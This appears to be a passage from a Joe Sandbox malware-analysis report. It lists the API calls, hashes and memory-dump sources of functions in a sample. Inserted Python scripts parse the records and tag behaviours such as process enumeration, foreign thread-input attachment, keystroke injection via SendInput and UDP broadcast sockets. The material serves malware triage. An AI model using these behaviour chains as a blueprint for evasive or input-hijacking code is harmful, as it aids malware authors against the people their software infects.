Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
• Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
• Instruction ID: acff5511a8827c87f86c8357ad4d1c59794d4c7218f57584259dce1f4e5bb775
• Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
• Instruction Fuzzy Hash: 10A136729003869FDB11CE19C8927AEBFE5FF51354F284169ED969B342D63C8D41C750
Uniqueness

Uniqueness Score: -1.00%

APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,007D0BD4,?), ref: 00790EE0
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,007D0BD4,?), ref: 00790EF8
• CLSIDFromProgID.OLE32(?,?,00000000,007CDCE0,000000FF,?,00000000,00000800,00000000,?,007D0BD4,?), ref: 00790F1D
• _memcmp.LIBVCRUNTIME ref: 00790F3E
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID:
• API String ID: 314563124-0
• Opcode ID: 694fa703ebec1dafc5f150077a948ee54eb4cc356f522de198885e6cb1759eb0
• Instruction ID: 977e831cf11f17b6678f3ece5025e02f29efbede49eebe9a136c16307703643b
• Opcode Fuzzy Hash: 694fa703ebec1dafc5f150077a948ee54eb4cc356f522de198885e6cb1759eb0
• Instruction Fuzzy Hash: 27811B71A10109EFCF14DF94C988EEEB7BAFF89315F204558E506AB250DB75AE05CBA0
Uniqueness

Uniqueness Score: -1.00%
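A way to turn these per-function records into something a triage script can act on, added here as an example; it is not Joe Sandbox's own tooling and not an official parser for its report format. It reads the "APIs" and "Similarity" fields in the layout the records on this page use, keeps subcall APIs (the report lists them as part of the function's behaviour), and tags each function with the behaviour its API chain suggests. The embedded sample is two records copied from this page (the AttachThreadInput/EnumChildWindows function above and the CreateToolhelp32Snapshot/Process32 function listed further down); the chain-to-behaviour table is my own heuristic, not a signature from the report.

```python
"""Parse Joe Sandbox function-analysis records and tag API chains by behaviour.

Added example (not Joe Sandbox code). Record layout follows the page's listing:
an 'APIs' block of '• Name.MODULE(args), ref: ADDR' lines (subcalls indented and
prefixed with 'Part of subcall function ADDR:'), then a 'Similarity' block of
'• <key> ID: <value>' fields.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Sample input: two records copied from this page's listing, whitespace trimmed.
SAMPLE = """APIs
  • Part of subcall function 00738577: _wcslen.LIBCMT ref: 0073858A
  • Part of subcall function 007936F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00793712
  • Part of subcall function 007936F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00793723
  • Part of subcall function 007936F4: GetCurrentThreadId.KERNEL32 ref: 0079372A
  • Part of subcall function 007936F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00793731
• GetFocus.USER32 ref: 007938C4
  • Part of subcall function 0079373B: GetParent.USER32(00000000), ref: 00793746
• GetClassNameW.USER32(?,?,00000100), ref: 0079390F
• EnumChildWindows.USER32(?,00793987), ref: 00793937
Similarity
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
• String ID: %s%d
• API String ID: 1272988791-1110647743
• Opcode ID: dd39491dee5bf5f1c200758ed891fbe21085951ae5bd5e83e3ff868d9b95b695
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 007BB10C
• Process32FirstW.KERNEL32(00000000,?), ref: 007BB11A
  • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
• Process32NextW.KERNEL32(00000000,?), ref: 007BB1FC
• CloseHandle.KERNEL32(00000000), ref: 007BB20B
  • Part of subcall function 0074E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00774D73,?), ref: 0074E395
Similarity
• API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
• String ID:
• API String ID: 1991900642-0
• Opcode ID: 547bfdce037f13c4131d39c00f3279ff67bfe0d79705afebc209d14a4c970575
"""

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+ID):\s*(?P<val>.*?)\s*$")

# Heuristic chains (my assumption, not a report signature): a tag fires when the
# function's API set hits at least one name from each of the two groups.
CHAINS = [
    ("process enumeration via Toolhelp32 snapshot",
     {"CreateToolhelp32Snapshot"}, {"Process32FirstW", "Process32NextW", "Process32First", "Process32Next"}),
    ("process-name comparison (AV/analysis-tool search pattern)",
     {"CreateToolhelp32Snapshot"}, {"CompareStringW", "_wcscmp", "_wcsicmp", "lstrcmpiW", "_memcmp"}),
    ("attaches to a foreign thread's input queue",
     {"AttachThreadInput"}, {"GetFocus", "SetFocus", "GetWindowThreadProcessId"}),
    ("window enumeration by class name",
     {"EnumChildWindows", "EnumWindows"}, {"GetClassNameW", "GetClassNameA"}),
]


@dataclass
class ApiCall:
    name: str
    module: str
    ref: int                      # call-site address from the 'ref:' field
    args: List[str]               # raw argument tokens; '?' means unknown in the report
    subcall_of: Optional[int]     # address of the subcall function, or None for a direct call


@dataclass
class Record:
    calls: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)

    def api_names(self):
        return {c.name for c in self.calls}

    def tags(self):
        names = self.api_names()
        return [tag for tag, trigger, companion in CHAINS if names & trigger and names & companion]


def parse_records(text: str) -> List[Record]:
    """Split report text into Records; a record starts at 'APIs' (or at a
    'Similarity' block with no preceding 'APIs', which hash-only records have)."""
    records: List[Record] = []
    cur: Optional[Record] = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs" or (stripped == "Similarity" and (cur is None or cur.fields)):
            cur = Record()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            sub = int(m["sub"], 16) if m["sub"] else None
            cur.calls.append(ApiCall(m["name"], m["mod"], int(m["ref"], 16), args, sub))
            continue
        m = FIELD_LINE.match(line)
        if m:
            cur.fields[m["key"]] = m["val"]
    return records


def summarize(text: str) -> List[dict]:
    """One dict per record: Opcode ID (stable function identity across runs), APIs, tags."""
    return [{"opcode_id": r.fields.get("Opcode ID", ""),
             "apis": sorted(r.api_names()), "tags": r.tags()} for r in parse_records(text)]


if __name__ == "__main__":
    for entry in summarize(SAMPLE):
        print(entry["opcode_id"][:16], entry["tags"])
```

The Opcode ID is the field worth keying on when correlating the same function across several sandbox runs or samples, since the call-site addresses in the `ref:` fields change with the image base.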

APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 007BB10C
• Process32FirstW.KERNEL32(00000000,?), ref: 007BB11A
  • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
• Process32NextW.KERNEL32(00000000,?), ref: 007BB1FC
• CloseHandle.KERNEL32(00000000), ref: 007BB20B
  • Part of subcall function 0074E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00774D73,?), ref: 0074E395
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
• String ID:
• API String ID: 1991900642-0
• Opcode ID: 547bfdce037f13c4131d39c00f3279ff67bfe0d79705afebc209d14a4c970575
• Instruction ID: 69df7b4a5f91c089b474717987d492f448f92f414c7df8d09382ee793f101a76
• Opcode Fuzzy Hash: 547bfdce037f13c4131d39c00f3279ff67bfe0d79705afebc209d14a4c970575
                                                                                                                                                                                          • Instruction Fuzzy Hash: FC513EB1508304EFD310EF24C88AA9BBBE8FF88754F40492DF98597252DB78D904CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: a0a4702c448c4e99b9a413b0e1740e0c342976139482724d99f435b06b6f2b31
• Instruction ID: 81ed2265b9d3c6ac3fdf4543670bd6cab1e016ea8030a8a26d96fe3030315f9d
• Opcode Fuzzy Hash: a0a4702c448c4e99b9a413b0e1740e0c342976139482724d99f435b06b6f2b31
• Instruction Fuzzy Hash: 70411831A00100EBDF257EBDCC8AABE3AA9EF417B0F548625FC1DD7191DA7D484197A2
Uniqueness
Uniqueness Score: -1.00%

APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 007B255A
• WSAGetLastError.WSOCK32 ref: 007B2568
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 007B25E7
• WSAGetLastError.WSOCK32 ref: 007B25F1
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ErrorLast$socket
• String ID:
• API String ID: 1881357543-0
• Opcode ID: a0563cc6c669dee095c6ffee93cc6c4edc852eb8a5d56c11b1c97e836f28c913
• Instruction ID: a64f0381b75966c75bdef828d9c20a5dcd51818043d8c897520fe73963b22599
• Opcode Fuzzy Hash: a0563cc6c669dee095c6ffee93cc6c4edc852eb8a5d56c11b1c97e836f28c913
• Instruction Fuzzy Hash: F341B174A00200AFE720AF24C88AF6677E5AF04758F54C49CF9158F6D3D779ED428B91
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetWindowRect.USER32(?,?), ref: 007C6D1A
• ScreenToClient.USER32(?,?), ref: 007C6D4D
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 007C6DBA
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
• Opcode ID: 3cc633e01927df22a931ea22a97bb10a5127adc0fe63cf9eb02e5402acf9c259
• Instruction ID: 8ad15e55bc78516c1d7be33b1aaeebef11a5cbe161825dd43262fcec388df118
• Opcode Fuzzy Hash: 3cc633e01927df22a931ea22a97bb10a5127adc0fe63cf9eb02e5402acf9c259
• Instruction Fuzzy Hash: 7551F774A00209EFCF24DF68D884EAE7BB6FB44360F20856EE9159B290D774AD81CB50
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 287231299e0e8a6b76d03b31dadd4990ba046031a9eda503371f4b83910e5fea
• Instruction ID: 2fd605177afc810f8f029eb947d6108a602a1b56c4374a3a2704667316130d9d
• Opcode Fuzzy Hash: 287231299e0e8a6b76d03b31dadd4990ba046031a9eda503371f4b83910e5fea
• Instruction Fuzzy Hash: 29414B71A00705EFD725AF78CC45BAA7BEDEB85710F10853AF916DB282D379994187C0
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007A61C8
• GetLastError.KERNEL32(?,00000000), ref: 007A61EE
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007A6213
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007A623F
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
• Opcode ID: eadb35d241849143de945ecef77230f89bebc177ef054c8352e50f09cf59c166
• Instruction ID: f22711d27c0e062b4770715f4596bf207a412a958a0e81f0719d7c2f437c2d4c
• Opcode Fuzzy Hash: eadb35d241849143de945ecef77230f89bebc177ef054c8352e50f09cf59c166
• Instruction Fuzzy Hash: DE411C35600610DFDB21DF15C549A59BBF2FF89714F198498E94AAB3A2CB38FD01CB91
Uniqueness
Uniqueness Score: -1.00%
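The records in this section are repetitive and their argument values are printed raw, which hides what a call actually does. In the socket function above, for example, `#21.WSOCK32` is an import by ordinal (wsock32.dll exports the Winsock 1.1 functions by ordinal, and ordinal 21 is setsockopt), and its arguments 0000FFFF and 00000020 are SOL_SOCKET and SO_BROADCAST, applied to the socket created just before it with socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP). The following Python is an added example for this page, not code from the Joe Sandbox report or from Joe Security: it parses these per-function records into objects, resolves the wsock32 ordinal and the Winsock constants (standard Winsock values), and attaches coarse triage tags whose names are this example's own. SAMPLE is a constructed, abridged copy of the socket and CreateHardLinkW records from this section, so the script runs offline.

```python
"""Parse the per-function records in this section of a Joe Sandbox report (the 'APIs',
'Memory Dump Source', 'Similarity' and 'Uniqueness' blocks) and decode the raw Winsock
arguments it prints.  Added example, not code from the report or from Joe Security."""
import re
from dataclasses import dataclass, field
# "<func>.<MODULE>(<args>), ref: <addr>" or "<func>.<MODULE> ref: <addr>", optionally
# prefixed "Part of subcall function <addr>: " when the call is made through a callee.
API_RE = re.compile(
    r"^(?:Part of subcall function [0-9A-F]{8}: )?(?P<func>\S+?)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
# wsock32.dll exports Winsock 1.1 by ordinal (subset); the report prints "#<n>" for such imports.
WSOCK32_ORDINALS = {16: "recv", 19: "send", 20: "sendto", 21: "setsockopt", 23: "socket"}
AF, SOCK_TYPE = {2: "AF_INET"}, {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
PROTO, SOL = {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}, {0xFFFF: "SOL_SOCKET"}
SO_OPT = {0x4: "SO_REUSEADDR", 0x8: "SO_KEEPALIVE", 0x20: "SO_BROADCAST"}

@dataclass
class Call:
    func: str                   # as printed: a name, or "#<ordinal>" for an ordinal import
    module: str
    args: list                  # raw hex strings; "?" = value the sandbox could not resolve
    ref: str                    # address of the call site
    def name(self) -> str:
        """Resolve a '#<ordinal>' wsock32 import to its function name."""
        if self.module == "WSOCK32" and self.func.startswith("#"):
            return WSOCK32_ORDINALS.get(int(self.func[1:]), self.func)
        return self.func

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)   # "API ID", "Opcode ID", "Source File", ...

def parse_call(line: str) -> "Call | None":
    m = API_RE.match(line.lstrip("• ").strip())
    if m:
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        return Call(m["func"], m["mod"], args, m["ref"])
    return None

def parse_records(text: str) -> list:
    """One FunctionRecord per function; a 'Uniqueness Score' line closes a record."""
    records, cur, in_apis = [], FunctionRecord(), False
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        if line == "APIs":
            in_apis = True
        elif line.startswith("Uniqueness Score:"):
            cur.fields["Uniqueness Score"] = line.split(":", 1)[1].strip()
            records.append(cur)
            cur, in_apis = FunctionRecord(), False
        elif not line.startswith("•"):          # any other bare line is a block header
            in_apis = False
        elif in_apis and (call := parse_call(line)) is not None:
            cur.calls.append(call)
        else:
            key, _, val = line.lstrip("• ").partition(":")
            cur.fields.setdefault(key.strip(), val.strip())   # first "Associated" line wins
    return records

def _const(table: dict, raw: str) -> str:
    return "?" if raw == "?" else table.get(int(raw, 16), hex(int(raw, 16)))

def decode_call(call: Call) -> str:
    """socket()/setsockopt() rendered with Winsock constant names; any other call verbatim."""
    name, a = call.name(), call.args
    if name == "socket" and len(a) >= 3:
        return f"socket({_const(AF, a[0])}, {_const(SOCK_TYPE, a[1])}, {_const(PROTO, a[2])})"
    if name == "setsockopt" and len(a) >= 3:
        level = _const(SOL, a[1])
        opt = _const(SO_OPT, a[2]) if level == "SOL_SOCKET" else a[2]
        return f"setsockopt(s, {level}, {opt}, ...)"
    return f"{name}({', '.join(a)})" if a else name

def tag_record(rec: FunctionRecord) -> list:
    """Coarse triage labels (this example's own names) for call chains seen in this section."""
    names = {c.name() for c in rec.calls}
    decoded = " ".join(decode_call(c) for c in rec.calls)
    tags = []
    if "SOCK_DGRAM" in decoded and "SO_BROADCAST" in decoded:
        tags.append("udp-broadcast-socket")
    if names & {"CreateHardLinkW", "CreateHardLinkA"}:
        tags.append("hard-link-create")
    if "CreateToolhelp32Snapshot" in names or "Toolhelp32" in rec.fields.get("API ID", ""):
        tags.append("process-enumeration")
    return tags

# Constructed input: two records from this section, abridged to their API and ID lines.
SAMPLE = """\
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 007B255A
• WSAGetLastError.WSOCK32 ref: 007B2568
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 007B25E7
• WSAGetLastError.WSOCK32 ref: 007B25F1
Similarity
• API ID: ErrorLast$socket
Uniqueness Score: -1.00%
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007A61C8
• GetLastError.KERNEL32(?,00000000), ref: 007A61EE
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007A6213
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007A623F
Uniqueness Score: -1.00%
"""
```

Feeding the whole function-analysis section to `parse_records` and printing `tag_record` next to the decoded calls turns hundreds of near-identical blocks into a short list of the functions worth opening in the dump; the `Opcode ID` and `Instruction Fuzzy Hash` fields survive in `FunctionRecord.fields`, so the same records can be matched against other reports by hash.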

APIs
• MultiByteToWideChar.KERNEL32(?,00000000,00000000,007570E1,00000000,00000000,00758649,?,00758649,?,00000001,007570E1,00000000,00000001,00758649,00758649), ref: 0076DC90
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0076DD19
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0076DD2B
• __freea.LIBCMT ref: 0076DD34
  • Part of subcall function 00763B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00756A79,?,0000015D,?,?,?,?,007585B0,000000FF,00000000,?,?), ref: 00763BC5
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2652629310-0
                                                                                                                                                                                          • Opcode ID: e929d15ae0d11df5a9a36b8952136d919f905d6164360a6e9f4d8a146f41f4c9
                                                                                                                                                                                          • Instruction ID: 5c293d5a9f6a8325a302a78c03b11c8ad85fd6bb2464c795609b679871edf9de
                                                                                                                                                                                          • Opcode Fuzzy Hash: e929d15ae0d11df5a9a36b8952136d919f905d6164360a6e9f4d8a146f41f4c9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 82319C72B1020AABDF349F64DC45EEE7BA5EF41310B194129FC0696190EB79CD55CBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0079B473
• SetKeyboardState.USER32(00000080), ref: 0079B48F
• PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0079B4FD
• SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0079B54F
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: f105950b9fac4665fb739a04f66bcd9691edf2b6f6e36303b48c6c98297348c3
• Instruction ID: cb272d1cf62fd89c3f13e823d449f6c3ea7c8d0e938260b642a659a3907cd35a
• Opcode Fuzzy Hash: f105950b9fac4665fb739a04f66bcd9691edf2b6f6e36303b48c6c98297348c3
• Instruction Fuzzy Hash: 21316B70A00248AEFF30CB65B949BFA7BB5AB44310F04821AF096961E2C37C8D519795
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,00001024,00000000,?), ref: 007C5DF0
• GetWindowLongW.USER32(?,000000F0), ref: 007C5E13
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 007C5E20
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007C5E46
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: LongWindow$InvalidateMessageRectSend
• String ID:
• API String ID: 3340791633-0
• Opcode ID: 44c47ffb36fe72a81dbf5f71f86c455f7a4d1216adb595a4229c57f6eab60576
• Instruction ID: a2ee2298b22c04dc9786ed373a570f5bb5706e38e4f78d539c6ce21903a00a8d
• Opcode Fuzzy Hash: 44c47ffb36fe72a81dbf5f71f86c455f7a4d1216adb595a4229c57f6eab60576
• Instruction Fuzzy Hash: 9D318F34B51B08AFEB349E14CC49FE93761AB05350F18411EF6129A2E1C77EBAC0DB41
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0079B5B8
• SetKeyboardState.USER32(00000080,?,00008000), ref: 0079B5D4
• PostMessageW.USER32(00000000,00000101,00000000), ref: 0079B63B
• SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0079B68D
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: 1d5e2c43665b77fdfa5d0f76d45ec8115e4f2e5a548dacf3bfb9336440343446
• Instruction ID: 9782c00281efcb69d30709033a3184d4085db9505dc88bcb2a367a1f767a4aa3
• Opcode Fuzzy Hash: 1d5e2c43665b77fdfa5d0f76d45ec8115e4f2e5a548dacf3bfb9336440343446
• Instruction Fuzzy Hash: A9313C30940608AEFF308B65B909BFA7BB6AF85310F04822EE481961D1C37CAE55CB95
Uniqueness

Uniqueness Score: -1.00%

APIs
• ClientToScreen.USER32(?,?), ref: 007C80D4
• GetWindowRect.USER32(?,?), ref: 007C814A
• PtInRect.USER32(?,?,?), ref: 007C815A
• MessageBeep.USER32(00000000), ref: 007C81C6
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
